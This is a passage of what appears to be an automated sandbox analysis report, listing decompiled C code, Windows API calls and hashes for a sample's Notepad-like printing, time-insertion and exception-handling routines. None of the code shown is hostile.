                                                  				return SendMessageW( *0x10c3f2c, 0xc2, 1,  &_v532);
                                                  			}






                                                  APIs
                                                  • GetLocalTime.KERNEL32(00000000,77294F20), ref: 010A215E
                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,00000000,00000000,?,000000FF), ref: 010A217D
                                                  • SendMessageW.USER32(000000C2,00000001,?), ref: 010A219D
                                                  • SendMessageW.USER32(000000C2,00000001,010BEDFC), ref: 010A21B1
                                                  • GetDateFormatW.KERNEL32(00000400,00000000,00000000,00000000,?,000000FF), ref: 010A21CC
                                                  • SendMessageW.USER32(000000C2,00000001,?), ref: 010A21E6
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$FormatTime$DateLocal
                                                  • String ID:
                                                  • API String ID: 3786825601-0
                                                  • Opcode ID: 4c53d80ad96bfb725ab84d6737266984cd0e07f0c1d4e6ebcd1291552bf2d7b2
                                                  • Instruction ID: 51cc3ee393fc0099b39dce032dd071cfa4b8e262eeb9e25468842e6ea0398814
                                                  • Opcode Fuzzy Hash: 4c53d80ad96bfb725ab84d6737266984cd0e07f0c1d4e6ebcd1291552bf2d7b2
                                                  • Instruction Fuzzy Hash: 0201087269021EBAFB30EB90DC8AFFA7B7CEB04B00F444865B754AA0C0D6E659458B51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A816D(struct _EXCEPTION_POINTERS* _a4) {
                                                  
                                                  				SetUnhandledExceptionFilter(0);
                                                  				return UnhandledExceptionFilter(_a4);
                                                  			}




                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,010A3FCB,?,?,?,00000000), ref: 010A8172
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 010A817B
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 91d3b440163b426f06caa4e1e443cf54077b409dd56aa78a25c0d55a0f24899e
                                                  • Instruction ID: 5461a0c5a44206bbf9b91fb9c7ff0a8363933e3463cfacb1a848a41ffe5345fd
                                                  • Opcode Fuzzy Hash: 91d3b440163b426f06caa4e1e443cf54077b409dd56aa78a25c0d55a0f24899e
                                                  • Instruction Fuzzy Hash: 6CB09231454209ABEB202BD1EA89B983F28EB06656F000018FA4D54054AB6754908B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • EnumSystemLocalesEx.KERNEL32(?,?,?,00000000), ref: 010AF44C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2099609381-0
                                                  • Opcode ID: fe063e91d98c4c89d873b346c279517a9968d5a91afba9f089fea825aac43351
                                                  • Instruction ID: b3ca74a3cc52d5736554e22f1edbfb761d554ccc406f0108cfb3849534c5c090
                                                  • Opcode Fuzzy Hash: fe063e91d98c4c89d873b346c279517a9968d5a91afba9f089fea825aac43351
                                                  • Instruction Fuzzy Hash: 7FC0483204020DBBEF121E85EC05BD93F2AEB09661F008410FA18980608773A661AB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetLocaleInfoEx.KERNEL32(?,?,00000002,?,?,010A90CA,?,?,?,00000002), ref: 010AF482
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: 0369067c0b1d466139f41d112985df96f9b769125b2a9e39a4c137fc4ae2edcf
                                                  • Instruction ID: 389222b38b1c8904305da17d4704895f600d6ce856bba24172c72a72dbcf676b
                                                  • Opcode Fuzzy Hash: 0369067c0b1d466139f41d112985df96f9b769125b2a9e39a4c137fc4ae2edcf
                                                  • Instruction Fuzzy Hash: A1C0483200020DFBCF025F95ED049DA3F2AFB09264B048010FA1C04021C7739930AB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A814A(_Unknown_base(*)()* _a4) {
                                                  
                                                  				return SetUnhandledExceptionFilter(_a4);
                                                  			}




                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(?,?,010A76D0,010A7685), ref: 010A8150
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: e1124996c28b10044328f0f38cd386c8f04fb7aa25cebb8dbd02bb792ea26e76
                                                  • Instruction ID: 0f8ad7942cad8e79861ff822c12efa28907174feb37662f370a3491f858f182f
                                                  • Opcode Fuzzy Hash: e1124996c28b10044328f0f38cd386c8f04fb7aa25cebb8dbd02bb792ea26e76
                                                  • Instruction Fuzzy Hash: 17A0223000020CFBCF202F82FC088C83F2CFB022A8B000020F80C00020EB33A8A08BC8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E010A1CB0() {
                                                  				signed int _v8;
                                                  				int _v12;
                                                  				void* _v16;
                                                  				intOrPtr _v50;
                                                  				signed int _v52;
                                                  				intOrPtr _v56;
                                                  				signed int _v58;
                                                  				signed short _v60;
                                                  				signed int _v64;
                                                  				struct HDC__* _v68;
                                                  				intOrPtr _v72;
                                                  				intOrPtr _v76;
                                                  				intOrPtr _v80;
                                                  				struct tagPD _v84;
                                                  				void* _v88;
                                                  				long _v92;
                                                  				char* _v96;
                                                  				signed int _v100;
                                                  				void* _v104;
                                                  				struct _DOCINFOW _v124;
                                                  				intOrPtr _v128;
                                                  				intOrPtr _v132;
                                                  				intOrPtr _v136;
                                                  				char _v140;
                                                  				intOrPtr _v168;
                                                  				intOrPtr _v176;
                                                  				signed char _v196;
                                                  				signed int _v200;
                                                  				intOrPtr _v224;
                                                  				struct tagOFNA _v228;
                                                  				struct tagLOGFONTW _v320;
                                                  				char _v1320;
                                                  				signed int _t102;
                                                  				signed int _t112;
                                                  				int _t117;
                                                  				int _t120;
                                                  				int _t124;
                                                  				int _t127;
                                                  				int _t132;
                                                  				void* _t134;
                                                  				void* _t135;
                                                  				signed int _t141;
                                                  				signed int _t153;
                                                  				void* _t156;
                                                  				signed int _t162;
                                                  				signed int _t166;
                                                  				int _t173;
                                                  				int _t176;
                                                  				int _t185;
                                                  				void* _t187;
                                                  				void* _t188;
                                                  
                                                  				E010A66E0( &_v84, 0, 0x42);
                                                  				_v80 =  *0x10c3f24;
                                                  				_v76 =  *0x10c510c;
                                                  				_v72 =  *0x10c5110;
                                                  				_v50 =  *0x10c3f20;
                                                  				_t188 = _t187 + 0xc;
                                                  				_v60 = 0;
                                                  				_v52 = 0;
                                                  				_v84 = 0x42;
                                                  				_v64 = 0x104;
                                                  				_v56 = 0xffff0001;
                                                  				_t102 = PrintDlgW( &_v84);
                                                  				if(_t102 == 0) {
                                                  					L19:
                                                  					return _t102;
                                                  				} else {
                                                  					 *0x10c510c = _v76;
                                                  					 *0x10c5110 = _v72;
                                                  					SetMapMode(_v68, 1);
                                                  					_v124.cbSize = 0x14;
                                                  					_v124.lpszDocName = 0x10c45b8;
                                                  					_v124.lpszOutput = 0;
                                                  					_v124.lpszDatatype = 0;
                                                  					_v124.fwType = 0;
                                                  					if((_v64 & 0x00000020) == 0) {
                                                  						L3:
                                                  						_t33 = GetWindowTextLengthW( *0x10c3f2c) + 1; // 0x1
                                                  						_t176 = _t33;
                                                  						_t156 = HeapAlloc(GetProcessHeap(), 0, _t176 + _t176);
                                                  						_v16 = _t156;
                                                  						if(_t156 != 0) {
                                                  							_v8 = GetWindowTextW( *0x10c3f2c, _t156, _t176);
                                                  							_t112 = StartDocW(_v68,  &_v124);
                                                  							__eflags = _t112;
                                                  							if(_t112 <= 0) {
                                                  								L18:
                                                  								DeleteDC(_v68);
                                                  								return HeapFree(GetProcessHeap(), 0, _t156);
                                                  							}
                                                  							_t117 = MulDiv( *0x10c4c90, GetDeviceCaps(_v68, 0x5a), 0x9ec);
                                                  							_v136 = _t117 - GetDeviceCaps(_v68, 0x71);
                                                  							_t120 = MulDiv( *0x10c4c94, GetDeviceCaps(_v68, 0x5a), 0x9ec);
                                                  							_v128 = GetDeviceCaps(_v68, 0x6f) - _t120;
                                                  							_t124 = MulDiv( *0x10c4c98, GetDeviceCaps(_v68, 0x58), 0x9ec);
                                                  							_v140 = _t124 - GetDeviceCaps(_v68, 0x70);
                                                  							_t127 = MulDiv( *0x10c4c9c, GetDeviceCaps(_v68, 0x58), 0x9ec);
                                                  							_v132 = GetDeviceCaps(_v68, 0x6e) - _t127;
                                                  							memcpy( &_v320, 0x10c3f40, 0x17 << 2);
                                                  							_t132 = MulDiv(_v320.lfHeight, GetDeviceCaps(_v68, 0x5a), _v12);
                                                  							_v320.lfWeight = _v320.lfWeight - 0x64;
                                                  							_v320 = _t132;
                                                  							_t134 = CreateFontIndirectW( &_v320);
                                                  							_v12 = _t134;
                                                  							_t135 = SelectObject(_v68, _t134);
                                                  							_t156 = _v16;
                                                  							_t173 = 1;
                                                  							_v88 = _t135;
                                                  							__eflags = 1 - _v52;
                                                  							if(1 > _v52) {
                                                  								L17:
                                                  								EndDoc(_v68);
                                                  								SelectObject(_v68, _v88);
                                                  								DeleteObject(_v12);
                                                  								goto L18;
                                                  							}
                                                  							_t166 = 0;
                                                  							__eflags = 0;
                                                  							_t141 = _t156 + _v8 * 2;
                                                  							_v8 = _t141;
                                                  							do {
                                                  								_v100 = _t141;
                                                  								_t185 = 1;
                                                  								_v104 = _t156;
                                                  								_v96 =  &_v1320;
                                                  								_v92 = 0;
                                                  								do {
                                                  									__eflags = _v64 & 0x00000002;
                                                  									if(__eflags == 0) {
                                                  										_t162 = 1;
                                                  										L13:
                                                  										_t166 = E010A1980(_v68,  &_v140, __eflags, _t162, _t185,  &_v104);
                                                  										_t185 = _t185 + 1;
                                                  										__eflags = _t166;
                                                  										if(_t166 == 0) {
                                                  											goto L17;
                                                  										}
                                                  										goto L14;
                                                  									}
                                                  									__eflags = _t185 - (_v58 & 0x0000ffff);
                                                  									if(_t185 > (_v58 & 0x0000ffff)) {
                                                  										break;
                                                  									}
                                                  									__eflags = _t185 - (_v60 & 0x0000ffff);
                                                  									_t162 = 0 | __eflags >= 0x00000000;
                                                  									goto L13;
                                                  									L14:
                                                  									__eflags = _v104 - _v100;
                                                  								} while (_v104 < _v100);
                                                  								__eflags = _t166;
                                                  								if(_t166 == 0) {
                                                  									goto L17;
                                                  								}
                                                  								_t173 = _t173 + 1;
                                                  								__eflags = _t173 - (_v52 & 0x0000ffff);
                                                  								_t141 = _v8;
                                                  							} while (_t173 <= (_v52 & 0x0000ffff));
                                                  							goto L17;
                                                  						}
                                                  						return DeleteDC(_v68);
                                                  					} else {
                                                  						E010A66E0( &_v228, 0, 0x58);
                                                  						_t188 = _t188 + 0xc;
                                                  						_v224 = _v80;
                                                  						_v228 = 0x58;
                                                  						_v176 = 0x806;
                                                  						_v200 = L"output.prn";
                                                  						_v196 = 0x104;
                                                  						_v168 = L"prn";
                                                  						_t153 = GetSaveFileNameW( &_v228);
                                                  						asm("sbb eax, eax");
                                                  						_t102 =  ~_t153 & L"output.prn";
                                                  						_v124.lpszOutput = _t102;
                                                  						if(_t102 == 0) {
                                                  							goto L19;
                                                  						} else {
                                                  							goto L3;
                                                  						}
                                                  					}
                                                  				}
                                                  			}























































                                                  APIs
                                                  • _memset.LIBCMT ref: 010A1CC1
                                                  • PrintDlgW.COMDLG32(?), ref: 010A1D0B
                                                  • SetMapMode.GDI32(?,00000001), ref: 010A1D2E
                                                  • _memset.LIBCMT ref: 010A1D68
                                                  • GetSaveFileNameW.COMDLG32(?), ref: 010A1DB2
                                                  • GetWindowTextLengthW.USER32 ref: 010A1DD2
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A1DE1
                                                  • HeapAlloc.KERNEL32(00000000), ref: 010A1DE8
                                                  • DeleteDC.GDI32(?), ref: 010A1DFA
                                                  • GetWindowTextW.USER32 ref: 010A1E0E
                                                  • StartDocW.GDI32(?,00000014), ref: 010A1E1E
                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 010A1E3D
                                                  • MulDiv.KERNEL32(00000000), ref: 010A1E4C
                                                  • GetDeviceCaps.GDI32(?,00000071), ref: 010A1E55
                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 010A1E69
                                                  • MulDiv.KERNEL32(00000000), ref: 010A1E72
                                                  • GetDeviceCaps.GDI32(?,0000006F), ref: 010A1E7B
                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 010A1E8C
                                                  • MulDiv.KERNEL32(00000000), ref: 010A1E95
                                                  • GetDeviceCaps.GDI32(?,00000070), ref: 010A1E9E
                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 010A1EB2
                                                  • MulDiv.KERNEL32(00000000), ref: 010A1EBB
                                                  • GetDeviceCaps.GDI32(?,0000006E), ref: 010A1EC4
                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 010A1EE5
                                                  • MulDiv.KERNEL32(?,00000000), ref: 010A1EF2
                                                  • CreateFontIndirectW.GDI32(?), ref: 010A1F08
                                                  • SelectObject.GDI32(?,00000000), ref: 010A1F15
                                                  • EndDoc.GDI32(?), ref: 010A1FB6
                                                  • SelectObject.GDI32(?,?), ref: 010A1FC2
                                                  • DeleteObject.GDI32(?), ref: 010A1FCB
                                                  • DeleteDC.GDI32(?), ref: 010A1FD5
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A1FDE
                                                  • HeapFree.KERNEL32(00000000), ref: 010A1FE5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: CapsDevice$Heap$DeleteObject$ProcessSelectTextWindow_memset$AllocCreateFileFontFreeIndirectLengthModeNamePrintSaveStart
                                                  • String ID: $B$X$d$output.prn$prn
                                                  • API String ID: 1012857974-290299934
                                                  • Opcode ID: 76a1c6afb9bd5251449a4714e256d19bcde66cf97625c41d9c3722fe9463210a
                                                  • Instruction ID: 421f3cfadb9668999931931a061ff8df3cb428f61af2f64e0476b321be325b46
                                                  • Opcode Fuzzy Hash: 76a1c6afb9bd5251449a4714e256d19bcde66cf97625c41d9c3722fe9463210a
                                                  • Instruction Fuzzy Hash: E0A10571D00258EFEB209FE4DD88BDEBBB9FB48304F004065EA85AB294DB7A5945CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E010A1980(struct HDC__* __ecx, int* __edx, void* __eflags, intOrPtr _a4, WCHAR* _a8, int _a12) {
                                                  				struct HDC__* _v8;
                                                  				struct tagSIZE _v16;
                                                  				int* _v20;
                                                  				struct tagSIZE _v28;
                                                  				struct tagTEXTMETRICW _v88;
                                                  				signed int _t93;
                                                  				int _t96;
                                                  				int _t104;
                                                  				int _t106;
                                                  				WCHAR* _t120;
                                                  				int _t121;
                                                  				signed int _t128;
                                                  				int _t131;
                                                  				int _t142;
                                                  				struct HDC__* _t153;
                                                  				signed int _t154;
                                                  				int _t156;
                                                  				struct HDC__* _t157;
                                                  				short _t162;
                                                  				signed int _t163;
                                                  				WCHAR* _t164;
                                                  				WCHAR* _t168;
                                                  				int _t169;
                                                  				int _t170;
                                                  				void* _t171;
                                                  				RECT* _t172;
                                                  				intOrPtr _t174;
                                                  				int _t175;
                                                  				void* _t178;
                                                  				int* _t179;
                                                  				void* _t180;
                                                  				void* _t184;
                                                  
                                                  				_t172 = __edx;
                                                  				_t168 = _a8;
                                                  				_t153 = __ecx;
                                                  				_v20 = __edx;
                                                  				_v8 = __ecx;
                                                  				_t178 = E010A1890(0x10c4ea8, _t168);
                                                  				_a8 = _t178;
                                                  				if(_t178 == 0) {
                                                  					L4:
                                                  					return 0;
                                                  				} else {
                                                  					if(_a4 == 0 || StartPage(__ecx) > 0) {
                                                  						GetTextMetricsW(_t153,  &_v88);
                                                  						_t92 = lstrlenW;
                                                  						if( *0x10c43b0 == 0) {
                                                  							_t154 = 0;
                                                  						} else {
                                                  							GetTextExtentPoint32W(_t153, 0x10c43b0, lstrlenW(0x10c43b0),  &_v16);
                                                  							if(_a4 != 0) {
                                                  								_t142 = lstrlenW(0x10c43b0);
                                                  								asm("cdq");
                                                  								ExtTextOutW(_t153, _t172->right - _v16.cx + _t172->left - _t168 >> 1, _t172->top, 4, _t172, 0x10c43b0, _t142, 0);
                                                  								_t178 = _a8;
                                                  							}
                                                  							_t92 = lstrlenW;
                                                  							_t154 = 1;
                                                  						}
                                                  						_t156 = _t154 * _v88.tmHeight + _t172->top;
                                                  						if( *_t178 == 0) {
                                                  							_t93 = 0;
                                                  						} else {
                                                  							GetTextExtentPoint32W(_v8, _t178,  *_t92( &_v16), _t178);
                                                  							_t93 = 1;
                                                  						}
                                                  						_t179 = _a12;
                                                  						_t174 = _t172->bottom - _t93 * _v88.tmHeight + _t93 * _v88.tmHeight;
                                                  						_v16.cy = _t174;
                                                  						do {
                                                  							_t169 = _t179[3];
                                                  							if(_t169 != 0 ||  *_t179 >= _t179[1]) {
                                                  								L30:
                                                  								if( *0x10c3f9c == 0) {
                                                  									_t170 = _t179[3];
                                                  									goto L40;
                                                  								} else {
                                                  									goto L31;
                                                  								}
                                                  							} else {
                                                  								while(1) {
                                                  									L16:
                                                  									_t162 =  *( *_t179) & 0x0000ffff;
                                                  									if(_t162 == 0xa || _t162 == 0xd) {
                                                  										goto L30;
                                                  									}
                                                  									if(_t162 != 9) {
                                                  										if(_t169 >= 0x1f4) {
                                                  											goto L28;
                                                  										} else {
                                                  											_t179[3] = _t179[3] + 1;
                                                  											_t179[2][_t169] = _t162;
                                                  											goto L27;
                                                  										}
                                                  									} else {
                                                  										_t171 = 0;
                                                  										do {
                                                  											_t163 = _t179[3];
                                                  											if(_t163 >= 0x1f4) {
                                                  												if( *0x10c3f9c == 0) {
                                                  													goto L23;
                                                  												}
                                                  											} else {
                                                  												_t179[2][_t163] = 0x20;
                                                  												_t174 = _v16.cy;
                                                  												_t179[3] = _t163 + 1;
                                                  												goto L23;
                                                  											}
                                                  											L27:
                                                  											_t169 = _t179[3];
                                                  											if(_t169 < 0x1f4) {
                                                  												L29:
                                                  												 *_t179 =  *_t179 + 2;
                                                  												if( *_t179 < _t179[1]) {
                                                  													goto L16;
                                                  												} else {
                                                  													goto L30;
                                                  												}
                                                  											} else {
                                                  												L28:
                                                  												if( *0x10c3f9c != 0) {
                                                  													L31:
                                                  													GetTextExtentExPointW(_v8, _t179[2], _t179[3], _v20[2] -  *_v20,  &_a12, 0,  &_v28);
                                                  													_t170 = _a12;
                                                  													if(_t170 < _t179[3]) {
                                                  														_t120 = _t179[2];
                                                  														_t164 =  &(_t120[_t170]);
                                                  														if(_t120[_t170] != 0x20) {
                                                  															_t121 = _t170;
                                                  															if(_t170 != 0) {
                                                  																while( *_t164 != 0x20) {
                                                  																	_t164 = _t164 - 2;
                                                  																	_t121 = _t121 - 1;
                                                  																	if(_t121 != 0) {
                                                  																		continue;
                                                  																	}
                                                  																	goto L37;
                                                  																}
                                                  															}
                                                  															L37:
                                                  															if(_t121 > 0) {
                                                  																_t170 = _t121 + 1;
                                                  																L40:
                                                  																_a12 = _t170;
                                                  															}
                                                  														}
                                                  													}
                                                  												} else {
                                                  													goto L29;
                                                  												}
                                                  											}
                                                  											goto L41;
                                                  											L23:
                                                  											_t171 = _t171 + 1;
                                                  										} while (_t171 < 8);
                                                  										goto L27;
                                                  									}
                                                  									goto L41;
                                                  								}
                                                  								goto L30;
                                                  							}
                                                  							L41:
                                                  							if(_a4 != 0) {
                                                  								ExtTextOutW(_v8,  *_v20, _t156, 4, _v20, _t179[2], _t170, 0);
                                                  								_t170 = _a12;
                                                  							}
                                                  							_t59 =  &(_t179[3]);
                                                  							 *_t59 = _t179[3] - _t170;
                                                  							_t96 = _t179[3];
                                                  							if( *_t59 == 0) {
                                                  								_t175 = _t179[1];
                                                  								if( *_t179 < _t175) {
                                                  									while(_t156 < _v16.cy) {
                                                  										_t170 =  *_t179;
                                                  										_t128 =  *_t170 & 0x0000ffff;
                                                  										if(_t128 == 0xa) {
                                                  											L50:
                                                  											_t156 = _t156 + _v88.tmExternalLeading + _v88.tmHeight;
                                                  											goto L51;
                                                  										} else {
                                                  											if(_t128 == 0xd) {
                                                  												if(_t128 == 0xa) {
                                                  													goto L50;
                                                  												}
                                                  												L51:
                                                  												_t131 = _t170 + 2;
                                                  												 *_t179 = _t131;
                                                  												if(_t131 < _t175) {
                                                  													continue;
                                                  												}
                                                  											}
                                                  										}
                                                  										goto L52;
                                                  									}
                                                  								}
                                                  								L52:
                                                  								_t174 = _v16.cy;
                                                  							} else {
                                                  								E010A81F0(_t179[2],  &(_t179[2][_t170]), _t96 + _t96);
                                                  								_t184 = _t184 + 0xc;
                                                  								_t156 = _t156 + _v88.tmExternalLeading + _v88.tmHeight;
                                                  							}
                                                  						} while ( *_t179 < _t179[1] && _t156 < _t174);
                                                  						_t180 = _a8;
                                                  						if( *_t180 == 0) {
                                                  							_t157 = _v8;
                                                  							goto L59;
                                                  						} else {
                                                  							_t104 = lstrlenW(_t180);
                                                  							_t157 = _v8;
                                                  							GetTextExtentPoint32W(_t157, _t180, _t104,  &_v16);
                                                  							if(_a4 != 0) {
                                                  								_t176 = _v20;
                                                  								_t106 = lstrlenW(_a8);
                                                  								asm("cdq");
                                                  								ExtTextOutW(_t157, _v20[2] - _v16.cx +  *_v20 - _t170 >> 1, _v20->bottom - _v16.cy, 4, _t176, _a8, _t106, 0);
                                                  								_t180 = _a8;
                                                  								L59:
                                                  								if(_a4 != 0) {
                                                  									EndPage(_t157);
                                                  								}
                                                  							}
                                                  						}
                                                  						HeapFree(GetProcessHeap(), 0, _t180);
                                                  						return 1;
                                                  					} else {
                                                  						MessageBoxW( *0x10c3f24, L"StartPage failed", L"Print Error", 0x30);
                                                  						HeapFree(GetProcessHeap(), 0, _t178);
                                                  						goto L4;
                                                  					}
                                                  				}
                                                  			}

                                                  APIs
                                                    • Part of subcall function 010A1890: GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A18F0
                                                    • Part of subcall function 010A1890: HeapAlloc.KERNEL32(00000000), ref: 010A18F7
                                                  • StartPage.GDI32 ref: 010A19B0
                                                  • MessageBoxW.USER32(StartPage failed,Print Error,00000030), ref: 010A19CC
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A19D5
                                                  • HeapFree.KERNEL32(00000000), ref: 010A19DC
                                                  • GetTextMetricsW.GDI32(?,?), ref: 010A19F2
                                                  • GetTextExtentPoint32W.GDI32(?,010C43B0,00000000), ref: 010A1A19
                                                  • ExtTextOutW.GDI32(?,?,?,00000004,?,010C43B0,00000000), ref: 010A1A4F
                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000), ref: 010A1A7F
                                                  • GetTextExtentExPointW.GDI32(?,00000000,?,00000000,?,00000000,?), ref: 010A1B58
                                                  • ExtTextOutW.GDI32(?,?,?,00000004,?,00000000,?,00000000), ref: 010A1BB3
                                                  • _memmove.LIBCMT ref: 010A1BCF
                                                  • GetTextExtentPoint32W.GDI32(?,?,00000000), ref: 010A1C3F
                                                  • lstrlenW.KERNEL32(?,00000000,?,?), ref: 010A1C59
                                                  • ExtTextOutW.GDI32(?,?,00000000,00000004,?,?,00000000), ref: 010A1C76
                                                  • EndPage.GDI32(?), ref: 010A1C8B
                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 010A1C94
                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 010A1C9B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Text$Heap$Extent$Point32Process$FreePage$AllocMessageMetricsPointStart_memmovelstrlen
                                                  • String ID: Print Error$StartPage failed
                                                  • API String ID: 1514916518-1681616764
                                                  • Opcode ID: c715c7e5aff2b88ee9ab638bd266860adb3502512a7afbf7e788e3d3105650e2
                                                  • Instruction ID: 1fd3a96bbde844559cde83e076cc4f915cf648cc8b05bce6663b29778c271b45
                                                  • Opcode Fuzzy Hash: c715c7e5aff2b88ee9ab638bd266860adb3502512a7afbf7e788e3d3105650e2
                                                  • Instruction Fuzzy Hash: 17B17A31610205EFEB20CF98C984FAAB7F9FF45310F548959FAD69B250E735A980CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E010A21F0() {
                                                  				struct tagRECT _v20;
                                                  				void* _t10;
                                                  				int _t12;
                                                  				struct HWND__* _t18;
                                                  				signed int _t26;
                                                  				long _t30;
                                                  				void* _t31;
                                                  				void* _t34;
                                                  				int _t37;
                                                  
                                                  				_t1 = GetWindowTextLengthW( *0x10c3f2c) + 1; // 0x1
                                                  				_t37 = _t1;
                                                  				_t10 = HeapAlloc(GetProcessHeap(), 0, _t37 + _t37);
                                                  				_t31 = _t10;
                                                  				if(_t31 != 0) {
                                                  					GetWindowTextW( *0x10c3f2c, _t31, _t37);
                                                  					_t12 = SendMessageW( *0x10c3f2c, 0xb8, 0, 0);
                                                  					DestroyWindow( *0x10c3f2c);
